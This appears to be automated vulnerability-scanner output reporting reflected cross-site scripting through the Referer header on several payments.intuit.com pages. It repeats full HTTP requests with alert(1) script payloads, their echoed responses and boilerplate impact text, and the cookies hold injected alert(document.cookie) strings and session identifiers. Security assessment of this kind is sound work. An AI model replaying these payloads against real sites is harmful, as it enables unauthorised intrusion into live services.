GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 89bfc--><script>alert(1)</script>439a0271950 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=89bfc--><script>alert(1)</script>439a0271950
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13123'-alert(1)-'be5801a90fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload d754d--><script>alert(1)</script>cf0ed983ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=d754d--><script>alert(1)</script>cf0ed983ea
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac0d6'-alert(1)-'c1f71db423d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 3c927--><script>alert(1)</script>c31793869de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=3c927--><script>alert(1)</script>c31793869de
The value of the Referer HTTP header is copied into an HTML comment. The payload 88c20--><script>alert(1)</script>924f3a86d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=88c20--><script>alert(1)</script>924f3a86d14
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8442e'-alert(1)-'9e35c41500 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 13789--><script>alert(1)</script>c6658a6c597 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=13789--><script>alert(1)</script>c6658a6c597
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51516'-alert(1)-'1ab853b004d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 189b5'-alert(1)-'d3b08e9e2f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 18139--><script>alert(1)</script>e22e5c6761f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=18139--><script>alert(1)</script>e22e5c6761f
The value of the Referer HTTP header is copied into an HTML comment. The payload f7c47--><script>alert(1)</script>3f78b487239 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
